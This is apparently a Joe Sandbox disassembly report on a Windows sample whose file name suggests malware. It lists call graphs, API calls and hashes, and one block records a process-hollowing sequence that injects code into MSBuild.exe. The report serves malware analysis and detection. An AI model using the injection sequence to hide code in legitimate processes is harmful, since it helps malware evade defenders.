9189->9191 9190->9162 9215 c6ccf9 9190->9215 9191->9186 9193 c6cc40 9192->9193 9194 c6cc50 9193->9194 9195 c6cc48 9193->9195 9196 c68dbc ___std_exception_copy 39 API calls 9194->9196 9197 c6a83b __freea 14 API calls 9195->9197 9198 c6cc5c 9196->9198 9197->9162 9199 c6ccd4 9198->9199 9200 c6cc63 9198->9200 9202 c67898 __strnicoll 11 API calls 9199->9202 9228 c6f07c 9200->9228 9204 c6ccde 9202->9204 9205 c6cc8a 9207 c6aec7 __strnicoll 14 API calls 9205->9207 9206 c6cca9 9208 c6a83b __freea 14 API calls 9206->9208 9209 c6cc8f 9207->9209 9208->9184 9210 c6a83b __freea 14 API calls 9209->9210 9210->9162 9212 c6ccec 9211->9212 9213 c6cace 9211->9213 9243 c6cd4e 9212->9243 9213->9161 9213->9163 9213->9190 9216 c6cb6c 9215->9216 9218 c6cd0f 9215->9218 9216->9172 9216->9178 9218->9216 9258 c6ef8b 9218->9258 9220 c6c841 9219->9220 9221 c6c85c 9219->9221 9220->9221 9222 c6c84d 9220->9222 9223 c6c86b 9221->9223 9358 c6edb8 9221->9358 9224 c6aec7 __strnicoll 14 API calls 9222->9224 9365 c6edeb 9223->9365 9227 c6c852 std::_Xinvalid_argument 9224->9227 9227->9189 9377 c6b9e4 9228->9377 9233 c6f0ef 9234 c6f0fb 9233->9234 9236 c6a83b __freea 14 API calls 9233->9236 9238 c6a83b __freea 14 API calls 9234->9238 9240 c6cc84 9234->9240 9235 c6b9e4 39 API calls 9237 c6f0cc 9235->9237 9236->9234 9239 c6ba7c 17 API calls 9237->9239 9238->9240 9241 c6f0d9 9239->9241 9240->9205 9240->9206 9241->9233 9242 c6f0e3 SetEnvironmentVariableW 9241->9242 9242->9233 9244 c6cd61 9243->9244 9251 c6cd5c 9243->9251 9245 c6af77 _unexpected 14 API calls 9244->9245 9255 c6cd7e 9245->9255 9246 c6cdec 9247 c67da6 CallUnexpected 39 API calls 9246->9247 9249 c6cdf1 9247->9249 9248 c6a83b __freea 14 API calls 9248->9251 9250 c67898 __strnicoll 11 API calls 9249->9250 9252 c6cdfd 9250->9252 9251->9213 9253 c6af77 _unexpected 14 API calls 9253->9255 9254 c6a83b __freea 14 API calls 9254->9255 9255->9246 9255->9249 9255->9253 9255->9254 9256 c68dbc ___std_exception_copy 39 API calls 9255->9256 9257 c6cddb 9255->9257 
9256->9255 9257->9248 9259 c6ef9f 9258->9259 9260 c6ef99 9258->9260 9276 c6efb4 9259->9276 9263 c6f751 9260->9263 9264 c6f709 9260->9264 9296 c6f767 9263->9296 9265 c6f70f 9264->9265 9268 c6f72c 9264->9268 9267 c6aec7 __strnicoll 14 API calls 9265->9267 9270 c6f714 9267->9270 9272 c6aec7 __strnicoll 14 API calls 9268->9272 9275 c6f74a 9268->9275 9269 c6f71f 9269->9218 9271 c6786b __strnicoll 39 API calls 9270->9271 9271->9269 9273 c6f73b 9272->9273 9274 c6786b __strnicoll 39 API calls 9273->9274 9274->9269 9275->9218 9277 c6a038 __strnicoll 39 API calls 9276->9277 9278 c6efca 9277->9278 9279 c6efe6 9278->9279 9280 c6effd 9278->9280 9291 c6efaf 9278->9291 9281 c6aec7 __strnicoll 14 API calls 9279->9281 9283 c6f006 9280->9283 9284 c6f018 9280->9284 9282 c6efeb 9281->9282 9285 c6786b __strnicoll 39 API calls 9282->9285 9286 c6aec7 __strnicoll 14 API calls 9283->9286 9287 c6f025 9284->9287 9288 c6f038 9284->9288 9285->9291 9292 c6f00b 9286->9292 9289 c6f767 __strnicoll 39 API calls 9287->9289 9314 c6f832 9288->9314 9289->9291 9291->9218 9294 c6786b __strnicoll 39 API calls 9292->9294 9294->9291 9295 c6aec7 __strnicoll 14 API calls 9295->9291 9297 c6f777 9296->9297 9298 c6f791 9296->9298 9299 c6aec7 __strnicoll 14 API calls 9297->9299 9300 c6f7b0 9298->9300 9301 c6f799 9298->9301 9304 c6f77c 9299->9304 9302 c6f7d3 9300->9302 9303 c6f7bc 9300->9303 9305 c6aec7 __strnicoll 14 API calls 9301->9305 9311 c6a038 __strnicoll 39 API calls 9302->9311 9313 c6f787 9302->9313 9307 c6aec7 __strnicoll 14 API calls 9303->9307 9308 c6786b __strnicoll 39 API calls 9304->9308 9306 c6f79e 9305->9306 9309 c6786b __strnicoll 39 API calls 9306->9309 9310 c6f7c1 9307->9310 9308->9313 9309->9313 9312 c6786b __strnicoll 39 API calls 9310->9312 9311->9313 9312->9313 9313->9269 9315 c6a038 __strnicoll 39 API calls 9314->9315 9316 c6f845 9315->9316 9319 c6f878 9316->9319 9322 c6f8ac __strnicoll 9319->9322 9320 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9321 c6f04e 
9320->9321 9321->9291 9321->9295 9323 c6f92c 9322->9323 9324 c6fb10 9322->9324 9326 c6f919 GetCPInfo 9322->9326 9332 c6f930 9322->9332 9325 c6b55e __strnicoll MultiByteToWideChar 9323->9325 9323->9332 9327 c6f9b2 9325->9327 9326->9323 9326->9332 9328 c6fb04 9327->9328 9329 c6b3b5 __strnicoll 15 API calls 9327->9329 9331 c6f9d9 __alloca_probe_16 9327->9331 9327->9332 9330 c6b43d __freea 14 API calls 9328->9330 9329->9331 9330->9332 9331->9328 9333 c6b55e __strnicoll MultiByteToWideChar 9331->9333 9332->9320 9332->9324 9334 c6fa25 9333->9334 9334->9328 9335 c6b55e __strnicoll MultiByteToWideChar 9334->9335 9336 c6fa41 9335->9336 9336->9328 9337 c6fa4f 9336->9337 9338 c6fab2 9337->9338 9339 c6b3b5 __strnicoll 15 API calls 9337->9339 9342 c6fa68 __alloca_probe_16 9337->9342 9340 c6b43d __freea 14 API calls 9338->9340 9339->9342 9341 c6fab8 9340->9341 9343 c6b43d __freea 14 API calls 9341->9343 9342->9338 9344 c6b55e __strnicoll MultiByteToWideChar 9342->9344 9343->9332 9345 c6faab 9344->9345 9345->9338 9346 c6fad4 9345->9346 9352 c691b0 9346->9352 9349 c6b43d __freea 14 API calls 9350 c6faf4 9349->9350 9351 c6b43d __freea 14 API calls 9350->9351 9351->9332 9353 c69638 __strnicoll 5 API calls 9352->9353 9354 c691bb 9353->9354 9355 c693b4 __strnicoll 5 API calls 9354->9355 9356 c691c1 9354->9356 9357 c69201 CompareStringW 9355->9357 9356->9349 9357->9356 9359 c6edc3 9358->9359 9360 c6edd8 HeapSize 9358->9360 9361 c6aec7 __strnicoll 14 API calls 9359->9361 9360->9223 9362 c6edc8 9361->9362 9363 c6786b __strnicoll 39 API calls 9362->9363 9364 c6edd3 9363->9364 9364->9223 9366 c6ee03 9365->9366 9367 c6edf8 9365->9367 9368 c6ee0b 9366->9368 9375 c6ee14 _unexpected 9366->9375 9369 c6b3b5 __strnicoll 15 API calls 9367->9369 9370 c6a83b __freea 14 API calls 9368->9370 9373 c6ee00 9369->9373 9370->9373 9371 c6ee3e HeapReAlloc 9371->9373 9371->9375 9372 c6ee19 9374 c6aec7 __strnicoll 14 API calls 9372->9374 9373->9227 9374->9373 9375->9371 9375->9372 9376 c66d13 _unexpected 2 API 
calls 9375->9376 9376->9375 9378 c6a038 __strnicoll 39 API calls 9377->9378 9379 c6b9f6 9378->9379 9380 c6ba08 9379->9380 9385 c69191 9379->9385 9382 c6ba7c 9380->9382 9391 c6bc52 9382->9391 9388 c6961e 9385->9388 9389 c69599 _unexpected 5 API calls 9388->9389 9390 c69199 9389->9390 9390->9380 9392 c6bc60 9391->9392 9393 c6bc7a 9391->9393 9409 c6ba62 9392->9409 9395 c6bca0 9393->9395 9396 c6bc81 9393->9396 9397 c6b55e __strnicoll MultiByteToWideChar 9395->9397 9408 c6ba94 9396->9408 9413 c6ba23 9396->9413 9398 c6bcaf 9397->9398 9400 c6bcb6 GetLastError 9398->9400 9402 c6bcdc 9398->9402 9404 c6ba23 15 API calls 9398->9404 9418 c6aeed 9400->9418 9405 c6b55e __strnicoll MultiByteToWideChar 9402->9405 9402->9408 9404->9402 9407 c6bcf3 9405->9407 9406 c6aec7 __strnicoll 14 API calls 9406->9408 9407->9400 9407->9408 9408->9233 9408->9235 9410 c6ba6d 9409->9410 9411 c6ba75 9409->9411 9412 c6a83b __freea 14 API calls 9410->9412 9411->9408 9412->9411 9414 c6ba62 14 API calls 9413->9414 9415 c6ba31 9414->9415 9423 c6b9c5 9415->9423 9426 c6aeda 9418->9426 9420 c6aef8 __dosmaperr 9421 c6aec7 __strnicoll 14 API calls 9420->9421 9422 c6af0b 9421->9422 9422->9406 9424 c6b3b5 __strnicoll 15 API calls 9423->9424 9425 c6b9d2 9424->9425 9425->9408 9427 c698d8 __dosmaperr 14 API calls 9426->9427 9428 c6aedf 9427->9428 9428->9420 9430 c61ca1 9429->9430 9439 c63c1a 9430->9439 9432 c61cd1 9453 c61dc0 9432->9453 9438 c61d52 9438->8400 9441 c63c1f 9439->9441 9442 c63c39 9441->9442 9443 c66d13 _unexpected 2 API calls 9441->9443 9444 c63c3b std::_Throw_Cpp_error 9441->9444 9473 c67e10 9441->9473 9442->9432 9443->9441 9445 c6449e std::_Throw_Cpp_error 9444->9445 9480 c6556e 9444->9480 9446 c6556e CallUnexpected RaiseException 9445->9446 9448 c644bb IsProcessorFeaturePresent 9446->9448 9450 c644d1 9448->9450 9483 c645b7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9450->9483 9452 c645b4 9452->9432 9484 c632d0 9453->9484 9455 c61d00 9456 c61e00 

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00C7A11B,00C7A10B), ref: 00C7A33F
                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C7A352
                                                                                                                  • Wow64GetThreadContext.KERNEL32(00000104,00000000), ref: 00C7A370
                                                                                                                  • ReadProcessMemory.KERNELBASE(00000108,?,00C7A15F,00000004,00000000), ref: 00C7A394
                                                                                                                  • VirtualAllocEx.KERNELBASE(00000108,?,?,00003000,00000040), ref: 00C7A3BF
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000108,00000000,?,?,00000000,?), ref: 00C7A417
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000108,00400000,?,?,00000000,?,00000028), ref: 00C7A462
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000108,?,?,00000004,00000000), ref: 00C7A4A0
                                                                                                                  • Wow64SetThreadContext.KERNEL32(00000104,00DF0000), ref: 00C7A4DC
                                                                                                                  • ResumeThread.KERNELBASE(00000104), ref: 00C7A4EB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                  • API String ID: 2687962208-3857624555
                                                                                                                  • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                  • Instruction ID: f05ae44afc5af4e8989a2231f134c887e0900e99286f229fa5443b36d38bdd1a
                                                                                                                  • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                  • Instruction Fuzzy Hash: F5B1F67664064AAFDB60CF68CC80BDA73A5FF88714F158124EA1CAB341D774FA51CB94

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,50496CFE,?,00C695DD,?,?,00000000), ref: 00C6958F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  • Opcode ID: 3b3de5b394a9cedecce6513b924cc981b61146c7087d0783f16be9b79c0409d8
                                                                                                                  • Instruction ID: 98cae194ae27ed5b32745a9e70ecce2ad716a9fb7a0ecd7dde225fda461a1c8b
                                                                                                                  • Opcode Fuzzy Hash: 3b3de5b394a9cedecce6513b924cc981b61146c7087d0783f16be9b79c0409d8
                                                                                                                  • Instruction Fuzzy Hash: 54212731A01211A7CB328B65ECC4B6E376CDB45771F240220E92BE7290DB30EF45C6E0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378416451-0
                                                                                                                  • Opcode ID: 6de21070ea14a6c1a887fde9624166fe325c926e45db808f01cddbfc06e8140a
                                                                                                                  • Instruction ID: 6ff80b9a74b463431307ed1183f65f44a46b8824bbc788efc6f807fd515594ff
                                                                                                                  • Opcode Fuzzy Hash: 6de21070ea14a6c1a887fde9624166fe325c926e45db808f01cddbfc06e8140a
                                                                                                                  • Instruction Fuzzy Hash: 588110B0D0A248CFCB20DFA8D584BAEBBF0BF49305F184529E855A7341D7349A49DF96

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6D5AA
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6D673
                                                                                                                  • __freea.LIBCMT ref: 00C6D6DA
                                                                                                                    • Part of subcall function 00C6B3B5: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C63C34,?,?,00C62442,00001000,?,00C623AA), ref: 00C6B3E7
                                                                                                                  • __freea.LIBCMT ref: 00C6D6ED
                                                                                                                  • __freea.LIBCMT ref: 00C6D6FA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423051803-0
                                                                                                                  • Opcode ID: 1c79511222b6dc197ca5728741c2e7641e75380fa11d978e45e53d937c779eab
                                                                                                                  • Instruction ID: b07bbc78f9818e0519404f233dc6fb1d30b3467d9987c5d9f83d73e0b77411df
                                                                                                                  • Opcode Fuzzy Hash: 1c79511222b6dc197ca5728741c2e7641e75380fa11d978e45e53d937c779eab
                                                                                                                  • Instruction Fuzzy Hash: 7351F3B2B10246AFEB305F65CCC1EBB3BAAEF44314B190829FD1AD6151EB71CD50D661

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleFreeProtectVirtual
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 621788221-2766056989
                                                                                                                  • Opcode ID: c25f455a4425353001c2891736790d47a7f73ee29bcb753346017d0fc5cf0a75
                                                                                                                  • Instruction ID: fa59125e46d467b061809f6e70d5d27410db145ebafda2255b5a39b2bbf57dc5
                                                                                                                  • Opcode Fuzzy Hash: c25f455a4425353001c2891736790d47a7f73ee29bcb753346017d0fc5cf0a75
                                                                                                                  • Instruction Fuzzy Hash: C331A0B0D04208DFDB04DFA9D48979EBBF0BF48318F158829E859AB350D7749A84CF96

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 171 c667f4-c667ff 172 c66815-c66828 call c66885 171->172 173 c66801-c66814 call c6aec7 call c6786b 171->173 178 c66856 172->178 179 c6682a-c66847 CreateThread 172->179 183 c66858-c66864 call c668d5 178->183 181 c66865-c6686a 179->181 182 c66849-c66855 GetLastError call c6aeed 179->182 187 c66871-c66875 181->187 188 c6686c-c6686f 181->188 182->178 187->183 188->187
                                                                                                                  APIs
                                                                                                                  • CreateThread.KERNELBASE(00C634C0,?,Function_0000690C,00000000,?,00C634C0), ref: 00C6683D
                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,00C63379), ref: 00C66849
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C66850
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744730728-0
                                                                                                                  • Opcode ID: 098ec8b3e0153f7545d280d56bc35a437b198a3825a5812fe0da916b161c5aee
                                                                                                                  • Instruction ID: 64c200e96c00c6cf65739b4cbb8d4030ae395fec81d4334b40e64e20f6074e92
                                                                                                                  • Opcode Fuzzy Hash: 098ec8b3e0153f7545d280d56bc35a437b198a3825a5812fe0da916b161c5aee
                                                                                                                  • Instruction Fuzzy Hash: 96015E72900219FBDF259FB1DC85AAE7BA9EF08364F104158F911A7190DB71CE50EBA1

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 191 c6a0ba-c6a0e2 call c6a2bf 194 c6a2a7-c6a2a8 call c6a330 191->194 195 c6a0e8-c6a0ee 191->195 200 c6a2ad-c6a2af 194->200 196 c6a0f1-c6a0f7 195->196 198 c6a1f3-c6a212 call c66360 196->198 199 c6a0fd-c6a109 196->199 210 c6a215-c6a21a 198->210 199->196 201 c6a10b-c6a111 199->201 203 c6a2b0-c6a2be call c63c8e 200->203 204 c6a117-c6a123 IsValidCodePage 201->204 205 c6a1eb-c6a1ee 201->205 204->205 209 c6a129-c6a130 204->209 205->203 211 c6a152-c6a15f GetCPInfo 209->211 212 c6a132-c6a13e 209->212 213 c6a257-c6a261 210->213 214 c6a21c-c6a221 210->214 217 c6a161-c6a180 call c66360 211->217 218 c6a1df-c6a1e5 211->218 216 c6a142-c6a14d 212->216 213->210 215 c6a263-c6a28d call c6a60b 213->215 219 c6a254 214->219 220 c6a223-c6a22b 214->220 231 c6a28e-c6a29d 215->231 222 c6a29f-c6a2a0 call c6a649 216->222 217->216 233 c6a182-c6a189 217->233 218->194 218->205 219->213 224 c6a24c-c6a252 220->224 225 c6a22d-c6a230 220->225 232 c6a2a5 222->232 224->214 224->219 229 c6a232-c6a238 225->229 229->224 230 c6a23a-c6a24a 229->230 230->224 230->229 231->222 231->231 232->200 234 c6a1b5-c6a1b8 233->234 235 c6a18b-c6a190 233->235 236 c6a1bd-c6a1c4 234->236 235->234 237 c6a192-c6a19a 235->237 236->236 238 c6a1c6-c6a1da call c6a60b 236->238 239 c6a19c-c6a1a3 237->239 240 c6a1ad-c6a1b3 237->240 238->216 242 c6a1a4-c6a1ab 239->242 240->234 240->235 242->240 242->242
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00C6A2BF: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00C6A2EA
                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00C6A4CA,?,00000000,?,00000000,?), ref: 00C6A11B
                                                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C6A4CA,?,00000000,?,00000000,?), ref: 00C6A157
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 546120528-0
                                                                                                                  • Opcode ID: 5f3b5f85b92e33be86da218d323882ec047501453c5f5dc7c8c35961c87875b6
                                                                                                                  • Instruction ID: 37c6156b3f90d947a5f825c21aeb3d7078d3272cf630f802cab3277b9a89ff8e
                                                                                                                  • Opcode Fuzzy Hash: 5f3b5f85b92e33be86da218d323882ec047501453c5f5dc7c8c35961c87875b6
                                                                                                                  • Instruction Fuzzy Hash: 8E513470A402458FDB31CF75C8D17AEBBE5FF82300F18806ED1AAA7251D6759A46CF42

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 244 c69eac-c69eb1 245 c69eb3-c69ecb 244->245 246 c69ecd-c69ed1 245->246 247 c69ed9-c69ee2 245->247 246->247 248 c69ed3-c69ed7 246->248 249 c69ef4 247->249 250 c69ee4-c69ee7 247->250 251 c69f4e-c69f52 248->251 254 c69ef6-c69f03 GetStdHandle 249->254 252 c69ef0-c69ef2 250->252 253 c69ee9-c69eee 250->253 251->245 255 c69f58-c69f5b 251->255 252->254 253->254 256 c69f05-c69f07 254->256 257 c69f30-c69f42 254->257 256->257 258 c69f09-c69f12 GetFileType 256->258 257->251 259 c69f44-c69f47 257->259 258->257 260 c69f14-c69f1d 258->260 259->251 261 c69f25-c69f28 260->261 262 c69f1f-c69f23 260->262 261->251 263 c69f2a-c69f2e 261->263 262->251 263->251
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00C69D9B,00C790B8,0000000C), ref: 00C69EF8
                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00C69D9B,00C790B8,0000000C), ref: 00C69F0A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHandleType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3000768030-0
                                                                                                                  • Opcode ID: 8e55ae55c433639c9f05d972386665a23658ab3b82938cc8b4659b28294930c4
                                                                                                                  • Instruction ID: a5aa85190557f588a44226f6bf37cccd1ccb6eb842b8d02ebaa7ed96f7b62c9b
                                                                                                                  • Opcode Fuzzy Hash: 8e55ae55c433639c9f05d972386665a23658ab3b82938cc8b4659b28294930c4
                                                                                                                  • Instruction Fuzzy Hash: 1E11B13150874146C7308E7E8CC8726BA9CEB56330B39075AE2B7C65F2C735DA86D646

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00C78D78,0000000C), ref: 00C6691F
                                                                                                                  • ExitThread.KERNEL32 ref: 00C66926
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1611280651-0
                                                                                                                  • Opcode ID: 89cc13a4bfcf783a9619235a7833ac25b9d1770f9ac52226aef6f9b5602652ab
                                                                                                                  • Instruction ID: a56074287c7b65936f7725d3f7433f05bbc6e5aee52bd63571a7d3bfa7c5a14f
                                                                                                                  • Opcode Fuzzy Hash: 89cc13a4bfcf783a9619235a7833ac25b9d1770f9ac52226aef6f9b5602652ab
                                                                                                                  • Instruction Fuzzy Hash: C7F0C2709442059FDB20AFB0C98AB6E3B78FF44310F204199F516972A2CB309941DB90

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 284 c69357-c69366 call c69652 287 c6938f-c693a9 call c693b4 LCMapStringW 284->287 288 c69368-c6938d LCMapStringEx 284->288 292 c693af-c693b1 287->292 288->292
                                                                                                                  APIs
                                                                                                                  • LCMapStringEx.KERNELBASE(?,00C6D615,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00C6938B
                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00C6D615,?,?,-00000008,?,00000000), ref: 00C693A9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2568140703-0
                                                                                                                  • Opcode ID: dd93ec988a6e0fb53e9c7c13953bf0a7022d1364e70106de876897dbd676cd87
                                                                                                                  • Instruction ID: 33d43793dcf0f5fd0a4d5b1ddd3ea655845ecadfd0e4f327e128a1a03e5feaf8
                                                                                                                  • Opcode Fuzzy Hash: dd93ec988a6e0fb53e9c7c13953bf0a7022d1364e70106de876897dbd676cd87
                                                                                                                  • Instruction Fuzzy Hash: 98F0283240011ABBCF225F91DC45ADE7E6AFF58760F054120FA2965170CA36C971AB90

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 293 c6a83b-c6a844 294 c6a846-c6a859 RtlFreeHeap 293->294 295 c6a873-c6a874 293->295 294->295 296 c6a85b-c6a872 GetLastError call c6af10 call c6aec7 294->296 296->295
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,00C6B3A9,?,00000000,?,?,00C6B2C5,?,00000007,?,?,00C6B8DE,?,?), ref: 00C6A851
